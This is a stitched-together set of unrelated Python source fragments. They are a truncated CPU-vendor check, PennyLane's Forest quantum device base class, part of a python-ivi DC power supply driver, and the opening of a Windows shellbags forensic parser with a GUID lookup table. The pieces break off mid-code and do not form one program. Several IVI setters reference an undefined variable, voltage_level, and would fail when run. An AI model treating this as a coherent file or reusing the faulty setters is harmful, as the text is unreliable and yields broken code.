# #TODO(bitprim): Should recognize Cyrix' processors too.
elif vendor_string == "CentaurHauls":
modelstr, cpu_64bit, cpu_avx = _centaur_hauls(family, model)
cpuid_64bit = _is_long_mode_cpuid()
suffix = ''
if | |
"""
Base Forest device class
========================
**Module name:** :mod:`pennylane_forest.device`
.. currentmodule:: pennylane_forest.device
This module contains a base class for constructing Forest devices for PennyLane,
as well as some auxillary functions for converting PennyLane supported operations
(such as ``BasisState``, ``Rot``) to the equivalent pyQuil operations.
This class provides all the boilerplate for supporting Forest devices on PennyLane.
Auxiliary functions
-------------------
.. autosummary::
basis_state
rotation
controlled_phase
Classes
-------
.. autosummary::
ForestDevice
Code details
~~~~~~~~~~~~
"""
import uuid
import numpy as np
from collections import OrderedDict
from pyquil import Program
from pyquil.api._base_connection import ForestConnection
from pyquil.api._config import PyquilConfig
from pyquil.quil import DefGate
from pyquil.gates import X, Y, Z, H, PHASE, RX, RY, RZ, CZ, SWAP, CNOT, S, T, CSWAP, I
# following gates are not supported by PennyLane
from pyquil.gates import CPHASE00, CPHASE01, CPHASE10, CPHASE, CCNOT, ISWAP, PSWAP
from pennylane import QubitDevice, DeviceError
from pennylane.wires import Wires
from ._version import __version__
pyquil_config = PyquilConfig()
def basis_state(par, *wires):
"""Decompose a basis state into a list of PauliX matrices.
Args:
par (array): an array of integers from the set {0,1} representing
the computational basis state
wires (list): list of wires to prepare the basis state on
Returns:
list: list of PauliX matrix operators acting on each wire
"""
# pylint: disable=unused-argument
# need the identity here because otherwise only the "p=1" wires register in the circuit
return [X(w) if p == 1 else I(w) for w, p in zip(wires, par)]
def qubit_unitary(par, *wires):
r"""Define a pyQuil custom unitary quantum operation.
Args:
par (array): a :math:`2^N\times 2^N` unitary matrix
representing a custom quantum operation.
wires (list): list of wires to prepare the basis state on
Returns:
list: list of PauliX matrix operators acting on each wire
"""
if par.shape[0] != par.shape[1]:
raise ValueError("Qubit unitary must be a square matrix.")
if not np.allclose(par @ par.conj().T, np.identity(par.shape[0])):
raise ValueError("Qubit unitary matrix must be unitary.")
if par.shape != tuple([2 ** len(wires)] * 2):
raise ValueError("Qubit unitary matrix must be 2^Nx2^N, where N is the number of wires.")
# Get the Quil definition for the new gate
gate_definition = DefGate("U_{}".format(str(uuid.uuid4())[:8]), par)
# Get the gate constructor
gate_constructor = gate_definition.get_constructor()
return [gate_definition, gate_constructor(*wires)]
def rotation(a, b, c, wire):
r"""Arbitrary one-qubit rotation using three Euler angles.
Args:
a, b, c (float): rotation angles
wire (int): wire the rotation acts on
Returns:
list: Ry and Rz matrix operators acting on each wire
"""
return [RZ(a, wire), RY(b, wire), RZ(c, wire)]
def controlled_phase(phi, q, *wires):
r"""Maps the two-qubit controlled phase gate to the equivalent pyQuil command.
Args:
phi (float): the controlled phase angle
q (int): an integer between 0 and 3 that corresponds to a state
:math:`\{00, 01, 10, 11\}` on which the conditional phase
gets applied
wires (list): list of wires the CPHASE gate acts on
Returns:
pyquil.operation: the corresponding pyQuil operation
"""
# pylint: disable=no-value-for-parameter
if q == 0:
return CPHASE00(phi, *wires)
if q == 1:
return CPHASE01(phi, *wires)
if q == 2:
return CPHASE10(phi, *wires)
return CPHASE(phi, *wires)
# mapping operations supported by PennyLane to the
# corresponding pyQuil operation
pyquil_operation_map = {
"BasisState": basis_state,
"QubitUnitary": qubit_unitary,
"PauliX": X,
"PauliY": Y,
"PauliZ": Z,
"Hadamard": H,
"CNOT": CNOT,
"SWAP": SWAP,
"CZ": CZ,
"PhaseShift": PHASE,
"RX": RX,
"RY": RY,
"RZ": RZ,
"Rot": rotation,
# the following gates are provided by the PL-Forest plugin
"S": S,
"T": T,
"Toffoli": CCNOT,
"CPHASE": controlled_phase,
"CSWAP": CSWAP,
"ISWAP": ISWAP,
"PSWAP": PSWAP,
}
class ForestDevice(QubitDevice):
r"""Abstract Forest device for PennyLane.
Args:
wires (int or Iterable[Number, str]]): Number of subsystems represented by the device,
or iterable that contains unique labels for the subsystems as numbers (i.e., ``[-1, 0, 2]``)
or strings (``['ancilla', 'q1', 'q2']``).
shots (int): Number of circuit evaluations/random samples used
to estimate expectation values of observables.
For simulator devices, 0 means the exact EV is returned.
"""
pennylane_requires = ">=0.15"
version = __version__
author = "Rigetti Computing Inc."
_operation_map = pyquil_operation_map
_capabilities = {"model": "qubit", "tensor_observables": True}
def __init__(self, wires, shots=1000, **kwargs):
super().__init__(wires, shots)
self.reset()
@staticmethod
def _get_connection(**kwargs):
forest_url = kwargs.get("forest_url", pyquil_config.forest_url)
qvm_url = kwargs.get("qvm_url", pyquil_config.qvm_url)
compiler_url = kwargs.get("compiler_url", pyquil_config.quilc_url)
connection = ForestConnection(
sync_endpoint=qvm_url,
compiler_endpoint=compiler_url,
forest_cloud_endpoint=forest_url,
)
return connection
@property
def program(self):
"""View the last evaluated Quil program"""
return self.prog
def define_wire_map(self, wires):
if hasattr(self, "wiring"):
device_wires = Wires(self.wiring)
else:
# if no wiring given, use consecutive wire labels
device_wires = Wires(range(self.num_wires))
return OrderedDict(zip(wires, device_wires))
def apply(self, operations, **kwargs):
# pylint: disable=attribute-defined-outside-init
rotations = kwargs.get("rotations", [])
# Storing the active wires
self._active_wires = ForestDevice.active_wires(operations + rotations)
# Apply the circuit operations
for i, operation in enumerate(operations):
# map the ops' wires to the wire labels used by the device
device_wires = self.map_wires(operation.wires)
par = operation.parameters
if i > 0 and operation.name in ("QubitStateVector", "BasisState"):
raise DeviceError(
"Operation {} cannot be used after other Operations have already "
"been applied on a {} device.".format(operation.name, self.short_name)
)
self.prog += self._operation_map[operation.name](*par, *device_wires.labels)
self.prog += self.apply_rotations(rotations)
def apply_rotations(self, rotations):
"""Apply the circuit rotations.
This method serves as an auxiliary method to :meth:`~.ForestDevice.apply`.
Args:
rotations (List[pennylane.Operation]): operations that rotate into the
measurement basis
Returns:
pyquil.Program: the pyquil Program that specifies the corresponding rotations
"""
rotation_operations = Program()
for operation in rotations:
# map the ops' wires to the wire labels used by the device
device_wires = self.map_wires(operation.wires)
par = operation.parameters
rotation_operations += self._operation_map[operation.name](*par, *device_wires.labels)
return rotation_operations
def reset(self):
self.prog = Program()
self._active_wires = Wires([])
self._state = None
@property
def operations(self):
return set(self._operation_map.keys())
def mat_vec_product(self, mat, vec, device_wire_labels):
r"""Apply multiplication of a matrix to subsystems of the quantum state.
Args:
mat (array): matrix to multiply
vec (array): state vector to multiply
device_wire_labels (Sequence[int]): labels of device subsystems
Returns:
array: output vector after applying ``mat`` to input ``vec`` on specified subsystems
"""
num_wires = len(device_wire_labels)
if mat.shape != (2 ** num_wires, 2 ** num_wires):
raise ValueError(
f"Please specify a {2**num_wires} x {2**num_wires} matrix for {num_wires} wires."
)
# first, we need to reshape both the matrix and vector
# into blocks of 2x2 matrices, in order to do the higher
# order matrix multiplication
# Reshape the matrix to ``size=[2, 2, 2, ..., 2]``,
# where ``len(size) == 2*len(wires)``
#
# The first half of the dimensions correspond to a
# 'ket' acting on each wire/qubit, while the second
# half of the dimensions correspond to a 'bra' acting
# on each wire/qubit.
#
# E.g., if mat = \sum_{ijkl} (c_{ijkl} |ij><kl|),
# and wires=[0, 1], then
# the reshaped dimensions of mat are such that
# mat[i, j, k, l] == c_{ijkl}.
mat = np.reshape(mat, [2] * len(device_wire_labels) * 2)
# Reshape the state vector to ``size=[2, 2, ..., 2]``,
# where ``len(size) == num_wires``.
# Each wire corresponds to a subsystem.
#
# E.g., if vec = \sum_{ijk}c_{ijk}|ijk>,
# the reshaped dimensions of vec are such that
# vec[i, j, k] == c_{ijk}.
vec = np.reshape(vec, [2] * self.num_wires)
# Calculate the axes on which the matrix multiplication
# takes place. For the state vector, this simply
# corresponds to the requested wires. For the matrix,
# it is the latter half of the dimensions (the 'bra' dimensions).
#
# For example, if num_wires=3 and wires=[2, 0], then
# axes=((2, 3), (2, 0)). This is equivalent to doing
# np.einsum("ijkl,lnk", mat, vec).
axes = (np.arange(len(device_wire_labels), 2 * len(device_wire_labels)), device_wire_labels)
# After the tensor dot operation, the resulting array
# will have shape ``size=[2, 2, ..., 2]``,
# where ``len(size) == num_wires``, corresponding
# to a valid state of the system.
tdot = np.tensordot(mat, vec, axes=axes)
# Tensordot causes the axes given in `wires` to end up in the first positions
# of the resulting tensor. This corresponds to a (partial) transpose of
# the correct output state
# We'll need to invert this permutation to put the indices in the correct place
unused_idxs = [idx for idx in range(self.num_wires) if idx not in device_wire_labels]
perm = device_wire_labels + unused_idxs
# argsort gives the inverse permutation
inv_perm = np.argsort(perm)
state_multi_index = np.transpose(tdot, inv_perm)
return np.reshape(state_multi_index, 2 ** self.num_wires)
def analytic_probability(self, wires=None):
"""Return the (marginal) probability of each computational basis
state from the last | |
occurs, the output protection of the power supply disables the output.
Once the output protection is reset, the power supply resumes generating
a power signal.
Use the Query Output State function to determine if the power supply is in
an over-voltage or over-current state.
""", cls, grp, '4.3.10'))
self._init_outputs()
def _init_outputs(self):
try:
super(Base, self)._init_outputs()
except AttributeError:
pass
self._output_name = list()
self._output_current_limit = list()
self._output_current_limit_behavior = list()
self._output_enabled = list()
self._output_ovp_enabled = list()
self._output_ovp_limit = list()
self._output_voltage_level = list()
for i in range(self._output_count):
self._output_name.append("output%d" % (i+1))
self._output_current_limit.append(0)
self._output_current_limit_behavior.append('regulate')
self._output_enabled.append(False)
self._output_ovp_enabled.append(True)
self._output_ovp_limit.append(0)
self._output_voltage_level.append(0)
self.outputs._set_list(self._output_name)
def _get_output_current_limit(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_current_limit[index]
def _set_output_current_limit(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
if value < 0 or value > self._output_spec[index]['current_max']:
raise ivi.OutOfRangeException()
self._output_current_limit[index] = value
def _get_output_current_limit_behavior(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_current_limit_behavior[index]
def _set_output_current_limit_behavior(self, index, value):
index = ivi.get_index(self._output_name, index)
if value not in CurrentLimitBehavior:
raise ivi.ValueNotSupportedException()
self._output_current_limit_behavior[index] = value
def _get_output_enabled(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_enabled[index]
def _set_output_enabled(self, index, value):
index = ivi.get_index(self._output_name, index)
value = bool(value)
self._output_enabled[index] = value
def _get_output_ovp_enabled(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_ovp_enabled[index]
def _set_output_ovp_enabled(self, index, value):
index = ivi.get_index(self._output_name, index)
value = bool(value)
self._output_ovp_enabled[index] = value
def _get_output_ovp_limit(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_ovp_limit[index]
def _set_output_ovp_limit(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
if self._output_spec[index]['ovp_max'] >= 0:
if voltage_level < 0 or voltage_level > self._output_spec[index]['ovp_max']:
raise ivi.OutOfRangeException()
else:
if voltage_level > 0 or voltage_level < self._output_spec[index]['ovp_max']:
raise ivi.OutOfRangeException()
self._output_ovp_limit[index] = value
def _get_output_voltage_level(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_voltage_level[index]
def _set_output_voltage_level(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
if self._output_spec[index]['voltage_max'] >= 0:
if voltage_level < 0 or voltage_level > self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
else:
if voltage_level > 0 or voltage_level < self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
self._output_voltage_level[index] = value
def _get_output_name(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_name[index]
def _output_configure_current_limit(self, index, behavior, limit):
self._set_output_current_limit_behavior(index, behavior)
self._set_output_current_limit(index, limit)
def _output_configure_range(self, index, range_type, range_val):
index = ivi.get_index(self._output_name, index)
if range_type not in RangeType:
raise ivi.ValueNotSupportedException()
if range_type == 'voltage':
t = 0
elif range_type == 'current':
t = 1
k = dcpwr.get_range(self._output_range[index], t, range_val)
if k < 0:
raise ivi.OutOfRangeException()
self._output_spec[index]['voltage_max'] = self._output_range[index][k][0]
self._output_spec[index]['current_max'] = self._output_range[index][k][1]
pass
def _output_configure_ovp(self, index, enabled, limit):
if enabled:
self._set_output_ovp_limit(index, limit)
self._set_output_ovp_enabled(index, enabled)
def _output_query_current_limit_max(self, index, voltage_level):
index = ivi.get_index(self._output_name, index)
if self._output_spec[index]['voltage_max'] >= 0:
if voltage_level < 0 or voltage_level > self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
else:
if voltage_level > 0 or voltage_level < self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
return self._output_spec[index]['current_max']
def _output_query_voltage_level_max(self, index, current_limit):
index = ivi.get_index(self._output_name, index)
if current_limit < 0 or current_limit > self._output_spec[index]['current_limit_max']:
raise ivi.OutOfRangeException()
return self._output_spec[index]['voltage_max']
def _output_query_output_state(self, index, state):
index = ivi.get_index(self._output_name, index)
if state not in OutputState:
raise ivi.ValueNotSupportedException()
return False
def _output_reset_output_protection(self, index):
pass
class Trigger(ivi.IviContainer):
"Extension IVI methods for power supplies supporting trigger based output changes"
def __init__(self, *args, **kwargs):
super(Trigger, self).__init__(*args, **kwargs)
cls = 'IviDCPwr'
grp = 'Trigger'
ivi.add_group_capability(self, cls+grp)
self._output_trigger_source = list()
self._output_triggered_current_limit = list()
self._output_triggered_voltage_level = list()
self._add_property('outputs[].trigger_source',
self._get_output_trigger_source,
self._set_output_trigger_source,
None,
ivi.Doc("""
Specifies the trigger source. After an Initiate call, the power supply
waits for a trigger event from the source specified with this attribute.
After a trigger event occurs, the power supply changes the voltage level
to the value of the Triggered Voltage Level attribute and the current
limit to the value of the Triggered Current Limit attribute.
""", cls, grp, '5.2.1'))
self._add_property('outputs[].triggered_current_limit',
self._get_output_triggered_current_limit,
self._set_output_triggered_current_limit,
None,
ivi.Doc("""
Specifies the value to which the power supply sets the current limit after
a trigger event occurs. The units are Amps.
After an Initiate call, the power supply waits for a trigger event from
the source specified with the Trigger Source attribute. After a trigger
event occurs, the power supply sets the current limit to the value of this
attribute.
After a trigger occurs, the value of the Current Limit attribute reflects
the new value to which the current limit has been set.
""", cls, grp, '5.2.2'))
self._add_property('outputs[].triggered_voltage_level',
self._get_output_triggered_voltage_level,
self._set_output_triggered_voltage_level,
None,
ivi.Doc("""
Specifies the value to which the power supply sets the voltage level
after a trigger event occurs. The units are Volts.
After an Initiate call, the power supply waits for a trigger event from
the source specified with the Trigger Source attribute. After a trigger
event occurs, the power supply sets the voltage level to the value of this
attribute.
After a trigger occurs, the value of the Voltage Level attribute reflects
the new value to which the voltage level has been set.
""", cls, grp, '5.2.3'))
self._add_method('trigger.abort',
self._trigger_abort,
ivi.Doc("""
If the power supply is currently waiting for a trigger to change the
output signal, this function returns the power supply to the ignore
triggers state.
If the power supply is not waiting for a trigger, this function does
nothing and returns Success.
""", cls, grp, '5.3.1'))
self._add_method('trigger.initiate',
self._trigger_initiate,
ivi.Doc("""
If the power supply is not currently waiting for a trigger, this function
causes the power supply to wait for a trigger.
If the power supply is already waiting for a trigger, this function does
nothing and returns Success.
""", cls, grp, '5.3.5'))
def _init_outputs(self):
try:
super(Trigger, self)._init_outputs()
except AttributeError:
pass
self._output_trigger_source = list()
self._output_triggered_current_limit = list()
self._output_triggered_voltage_level = list()
for i in range(self._output_count):
self._output_trigger_source.append('')
self._output_triggered_current_limit.append(0)
self._output_triggered_voltage_level.append(0)
def _get_output_trigger_source(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_trigger_source[index]
def _set_output_trigger_source(self, index, value):
index = ivi.get_index(self._output_name, index)
value = str(value)
self._output_trigger_source[index] = value
def _get_output_triggered_current_limit(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_triggered_current_limit[index]
def _set_output_triggered_current_limit(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
if value < 0 or value > self._output_spec[index]['current_max']:
raise ivi.OutOfRangeException()
self._output_triggered_current_limit[index] = value
def _get_output_triggered_voltage_level(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_triggered_voltage_level[index]
def _set_output_triggered_voltage_level(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
if self._output_spec[index]['voltage_max'] >= 0:
if value < 0 or value > self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
else:
if value > 0 or value < self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
self._output_triggered_voltage_level[index] = value
def _trigger_abort(self):
pass
def _trigger_initiate(self):
pass
class SoftwareTrigger(ivi.IviContainer):
"Extension IVI methods for power supplies supporting software triggering"
def __init__(self, *args, **kwargs):
super(SoftwareTrigger, self).__init__(*args, **kwargs)
cls = 'IviDCPwr'
grp = 'SoftwareTrigger'
ivi.add_group_capability(self, cls+grp)
self._add_method('send_software_trigger',
self._send_software_trigger,
ivi.Doc("""
This function sends a software-generated trigger to the instrument. It is
only applicable for instruments using interfaces or protocols which
support an explicit trigger function. For example, with GPIB this function
could send a group execute trigger to the instrument. Other
implementations might send a ``*TRG`` command.
Since instruments interpret a software-generated trigger in a wide variety
of ways, the precise response of the instrument to this trigger is not
defined. Note that SCPI details a possible implementation.
This function should not use resources which are potentially shared by
other devices (for example, the VXI trigger lines). Use of such shared
resources may have undesirable effects on other devices.
This function should not check the instrument status. Typically, the
end-user calls this function only in a sequence of calls to other
low-level driver functions. The sequence performs one operation. The
end-user uses the low-level functions to optimize one or more aspects of
interaction with the instrument. To check the instrument status, call the
appropriate error query function at the conclusion of the sequence.
The trigger source attribute must accept Software Trigger as a valid
setting for this function to work. If the trigger source is not set to
Software Trigger, this function does nothing and returns the error Trigger
Not Software.
""", cls, grp, '6.2.1', 'send_software_trigger'))
def _send_software_trigger(self):
pass
class Measurement(ivi.IviContainer):
"Extension IVI methods for power supplies supporting measurement of | |
#Copyright 2014 Center for Internet Security - Computer Emergency Response Team (CIS-CERT)
#This is part of the CIS Enumeration and Scanning Program (CIS-ESP)
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#This is a modified version of shellbags.py by <NAME>
#<NAME>, <EMAIL>
#Copyright 2011 <NAME> while at Mandiant
#
#https://github.com/williballenthin/shellbags
#The original file is licensed under the Apache License, Version 2.0
import datetime
from BinaryParser import Block
from BinaryParser import align
from BinaryParser import OverrunBufferException
class SHITEMTYPE:
'''
This is like an enum...
These are the 'supported' SHITEM types
'''
UNKNOWN0 = 0x00
UNKNOWN1 = 0x01
UNKNOWN2 = 0x2E
FILE_ENTRY0 = 0x31
FILE_ENTRY1 = 0x32
FILE_ENTRY2 = 0xB1
FOLDER_ENTRY = 0x1F
VOLUME_NAME = 0x2F
NETWORK_VOLUME_NAME0 = 0x41
NETWORK_VOLUME_NAME1 = 0x42
NETWORK_VOLUME_NAME2 = 0x46
NETWORK_VOLUME_NAME3 = 0x47
NETWORK_SHARE = 0xC3
URI = 0x61
CONTROL_PANEL = 0x71
UNKNOWN3 = 0x74
class SHITEM(Block):
def __init__(self, buf, offset, parent):
super(SHITEM, self).__init__(buf, offset, parent)
self.declare_field("word", "size", 0x0)
self.declare_field("byte", "type", 0x2)
def __unicode__(self):
return u"SHITEM @ %s." % (hex(self.offset()))
def name(self):
return "??"
def m_date(self):
return datetime.datetime.min
def a_date(self):
return datetime.datetime.min
def cr_date(self):
return datetime.datetime.min
known_guids = {
"008ca0b1-55b4-4c56-b8a8-4de4b299d3bE": "Account Pictures",
"00bcfc5a-ed94-4e48-96a1-3f6217f21990": "RoamingTiles",
"00c6d95f-329c-409a-81d7-c46c66ea7f33": "Default Location",
"00f2886f-cd64-4fc9-8ec5-30ef6cdbe8c3": "Scanners and Cameras",
"0139d44e-6afe-49f2-8690-3dafcae6ffb8": "Programs",
"0142e4d0-fb7a-11dc-ba4a-000ffe7ab428": "Biometric Devices",
"018d5c66-4533-4307-9b53-224de2ed1fe6": "OneDrive",
"025a5937-a6be-4686-a844-36fe4bec8b6d": "Power Options",
"031e4825-7b94-4dc3-b131-e946b44c8dd5": "Libraries",
"04731b67-d933-450a-90e6-4acd2e9408fe": "Search Folder",
"0482af6c-08f1-4c34-8c90-e17ec98b1e17": "Public Account Pictures",
"054fae61-4dd8-4787-80b6-090220c4b700": "GameExplorer",
"05d7b0f4-2121-4eff-bf6b-ed3f69b894d9": "Taskbar (NotificationAreaIcons)",
"0762d272-c50a-4bb0-a382-697dcd729b80": "Users",
"087da31b-0dd3-4537-8e23-64a18591f88b": "Windows Security Center",
"0907616e-f5e6-48d8-9d61-a91c3d28106d": "Hyper-V Remote File Browsing",
"0ac0837c-bbf8-452a-850d-79d08e667ca7": "Computer",
"0afaced1-e828-11d1-9187-b532f1e9575d": "Folder Shortcut",
"0b2baaeb-0042-4dca-aa4d-3ee8648d03e5": "Pictures Library",
"0c15d503-d017-47ce-9016-7b3f978721cc": "Portable Device Values",
"0c39a5cf-1a7a-40c8-ba74-8900e6df5fcd": "Recent Items",
"0cd7a5c0-9f37-11ce-ae65-08002b2e1262": "Cabinet File",
"0d4c3db6-03a3-462f-a0e6-08924c41b5d4": "History",
"0df44eaa-ff21-4412-828e-260a8728e7f1": "Taskbar and Start Menu",
"0f214138-b1d3-4a90-bba9-27cbc0c5389a": "Sync Setup",
"11016101-e366-4d22-bc06-4ada335c892b": "Internet Explorer History and Feeds Shell Data Source for Windows Search",
"1206f5f1-0569-412c-8fec-3204630dfb70": "Credential Manager",
"13e7f612-f261-4391-bea2-39df4f3fa311": "Windows Desktop Search",
"15ca69b3-30ee-49c1-ace1-6b5ec372afb5": "Sample Playlists",
"15eae92e-f17a-4431-9f28-805e482dafd4": "Install New Programs ",
"1723d66a-7a12-443e-88c7-05e1bfe79983": "Previous Versions Delegate Folder",
"1777f761-68ad-4d8a-87bd-30b759fa33dd": "Favorites",
"17cd9488-1228-4b2f-88ce-4298e93e0966": "Default Programs",
"18989b1d-99b5-455b-841c-ab7c74e4ddfc": "Videos",
"190337d1-b8ca-4121-a639-6d472d16972a": "Search Results",
"1a6fdba2-f42d-4358-a798-b74d745926c5": "Recorded TV",
"1a9ba3a0-143a-11cf-8350-444553540000": "Shell Favorite Folder",
"1ac14e77-02e7-4e5d-b744-2eb1ae5198b7": "System32",
"1b3ea5dc-b587-4786-b4ef-bd1dc332aeae": "Libraries",
"1cf1260c-4dd0-4ebb-811f-33c572699fde": "Music",
"1d2680c9-0e2a-469d-b787-065558bc7d43": "Fusion Cache",
"1e87508d-89c2-42f0-8a7e-645a0f50ca58": "Applications",
"1f3427c8-5c10-4210-aa03-2ee45287d668": "User Pinned",
"1f43a58c-ea28-43e6-9ec4-34574a16ebb7": "Windows Desktop Search MAPI Namespace Extension Class",
"1f4de370-d627-11d1-ba4f-00a0c91eedba": "Search Results - Computers (Computer Search Results Folder, Network Computers)",
"1fa9085f-25a2-489b-85d4-86326eedcd87": "Manage Wireless Networks",
"208d2c60-3aea-1069-a2d7-08002b30309d": "My Network Places",
"20d04fe0-3aea-1069-a2d8-08002b30309d": "My Computer",
"2112ab0a-c86a-4ffe-a368-0de96e47012e": "Music",
"21ec2020-3aea-1069-a2dd-08002b30309d": "Control Panel",
"2227a280-3aea-1069-a2de-08002b30309d": "Printers",
"22877a6d-37a1-461a-91b0-dbda5aaebc99": "Recent Places",
"2400183a-6185-49fb-a2d8-4a392a602ba3": "Public Videos",
"241d7c96-f8bf-4f85-b01f-e2b043341a4b": "Workspaces Center(Remote Application and Desktop Connections)",
"24d89e24-2f19-4534-9dde-6a6671fbb8fe": "Documents",
"2559a1f0-21d7-11d4-bdaf-00c04f60b9f0": "Search",
"2559a1f1-21d7-11d4-bdaf-00c04f60b9f0": "Help and Support",
"2559a1f2-21d7-11d4-bdaf-00c04f60b9f0": "Windows Security",
"2559a1f3-21d7-11d4-bdaf-00c04f60b9f0": "Run...",
"2559a1f4-21d7-11d4-bdaf-00c04f60b9f0": "Internet",
"2559a1f5-21d7-11d4-bdaf-00c04f60b9f0": "E-mail",
"2559a1f6-21d7-11d4-bdaf-00c04f60b9f0": "OEM link",
"2559a1f7-21d7-11d4-bdaf-00c04f60b9f0": "Set Program Access and Defaults",
"259ef4b1-e6c9-4176-b574-481532c9bce8": "Game Controllers",
"267cf8a9-f4e3-41e6-95b1-af881be130ff": "Location Folder",
"26ee0668-a00a-44d7-9371-beb064c98683": "Control Panel",
"2728520d-1ec8-4c68-a551-316b684c4ea7": "Network Setup Wizard",
"27e2e392-a111-48e0-ab0c-e17705a05f85": "WPD Content Type Folder",
"28803f59-3a75-4058-995f-4ee5503b023c": "Bluetooth Devices",
"289978ac-a101-4341-a817-21eba7fd046d": "Sync Center Conflict Folder",
"289a9a43-be44-4057-a41b-587a76d7e7f9": "Sync Results",
"289af617-1cc3-42a6-926c-e6a863f0e3ba": "DLNA Media Servers Data Source",
"292108be-88ab-4f33-9a26-7748e62e37ad": "Videos library",
"2965e715-eb66-4719-b53f-1672673bbefa": "Results Folder",
"2a00375e-224c-49de-b8d1-440df7ef3ddc": "LocalizedResourcesDir",
"2b0f765d-c0e9-4171-908e-08a611b84ff6": "Cookies",
"2c36c0aa-5812-4b87-bfd0-4cd0dfb19b39": "Original Images",
"2e9e59c0-b437-4981-a647-9c34b9b90891": "Sync Setup Folder",
"2f6ce85c-f9ee-43ca-90c7-8a9bd53a2467": "File History Data Source",
"3080f90d-d7ad-11d9-bd98-0000947b0257": "Show Desktop",
"3080f90e-d7ad-11d9-bd98-0000947b0257": "Window Switcher",
"3214fab5-9757-4298-bb61-92a9deaa44ff": "Public Music",
"323ca680-c24d-4099-b94d-446dd2d7249e": "Common Places",
"328b0346-7eaf-4bbe-a479-7cb88a095f5b": "Layout Folder",
"335a31dd-f04b-4d76-a925-d6b47cf360df": "Backup and Restore Center",
"339719b5-8c47-4894-94c2-d8f77add44a6": "Pictures",
"33e28130-4e1e-4676-835a-98395c3bc3bb": "Pictures",
"352481e8-33be-4251-ba85-6007caedcf9d": "Temporary Internet Files",
"35786d3c-b075-49b9-88dd-029876e11c01": "Portable Devices",
"36011842-dccc-40fe-aa3d-6177ea401788": "Documents Search Results",
"36eef7db-88ad-4e81-ad49-0e313f0c35f8": "Windows Update",
"374de290-123f-4565-9164-39c4925e467b": "Downloads",
"37efd44d-ef8d-41b1-940d-96973a50e9e0": "Desktop Gadgets",
"38a98528-6cbf-4ca9-8dc0-b1e1d10f7b1b": "Connect To",
"3add1653-eb32-4cb0-bbd7-dfa0abb5acca": "Pictures",
"3c5c43a3-9ce9-4a9b-9699-2ac0cf6cc4bf": "Configure Wireless Network",
"3d644c9b-1fb8-4f30-9b45-f670235f79c0": "Public Downloads",
"3e7efb4c-faf1-453d-89eb-56026875ef90": "Windows Marketplace",
"3eb685db-65f9-4cf6-a03a-e3ef65729f3d": "RoamingAppData",
"3f2a72a7-99fa-4ddb-a5a8-c604edf61d6b": "Music Library",
"3f6bc534-dfa1-4ab4-ae54-ef25a74e0107": "System Restore",
"3f98a740-839c-4af7-8c36-5badfb33d5fd": "Documents library",
"4026492f-2f69-46b8-b9bf-5654fc07e423": "Windows Firewall",
"40419485-c444-4567-851a-2dd7bfa1684d": "Phone and Modem",
"418c8b64-5463-461d-88e0-75e2afa3c6fa": "Explorer Browser Results Folder",
"4234d49b-0245-4df3-b780-3893943456e1": "Applications",
"4336a54d-038b-4685-ab02-99bb52d3fb8b": "Samples",
"43668bf8-c14e-49b2-97c9-747784d784b7": "Sync Center",
"437ff9c0-a07f-4fa0-af80-84b6c6440a16": "Command Folder",
"450d8fba-ad25-11d0-98a8-0800361b1103": "My Documents",
"4564b25e-30cd-4787-82ba-39e73a750b14": "Recent Items Instance Folder",
"45c6afa5-2c13-402f-bc5d-45cc8172ef6b": "Toshiba Bluetooth Stack",
"46137b78-0ec3-426d-8b89-ff7c3a458b5e": "Network Neighborhood",
"46e06680-4bf0-11d1-83ee-00a0c90dc849": "NETWORK_DOMAIN",
"48daf80b-e6cf-4f4e-b800-0e69d84ee384": "Libraries",
"48e7caab-b918-4e58-a94d-505519c795dc": "Start Menu Folder",
"491e922f-5643-4af4-a7eb-4e7a138d8174": "Videos",
"4bd8d571-6d19-48d3-be97-422220080e43": "Music",
"4bfefb45-347d-4006-a5be-ac0cb0567192": "Conflicts",
"4c5c32ff-bb9d-43b0-b5b4-2d72e54eaaa4": "Saved Games",
"4d9f7874-4e0c-4904-967b-40b0d20c3e4b": "Internet",
"4dcafe13-e6a7-4c28-be02-ca8c2126280d": "Pictures Search Results",
"5224f545-a443-4859-ba23-7b5a95bdc8ef": "People Near Me",
"52528a6b-b9e3-4add-b60d-588c2dba842d": "Homegroup",
"52a4f021-7b75-48a9-9f6b-4b87a210bc8f": "Quick Launch",
"5399e694-6ce5-4d6c-8fce-1d8870fdcba0": "Control Panel command object for Start menu and desktop",
"54a754c0-4bf1-11d1-83ee-00a0c90dc849": "NETWORK_SHARE",
"56784854-c6cb-462b-8169-88e350acb882": "Contacts",
"58e3c745-d971-4081-9034-86e34b30836a": "Speech Recognition Options",
"59031a47-3f72-44a7-89c5-5595fe6b30ee": "Shared Documents Folder (Users Files)",
"5b3749ad-b49f-49c1-83eb-15370fbd4882": "TreeProperties",
"5b934b42-522b-4c34-bbfe-37a3ef7b9c90": "This Device Folder",
"5c4f28b5-f869-4e84-8e60-f11db97c5cc7": "Generic (All folder items)",
"5cd7aee2-2219-4a67-b85d-6c9ce15660cb": "Programs",
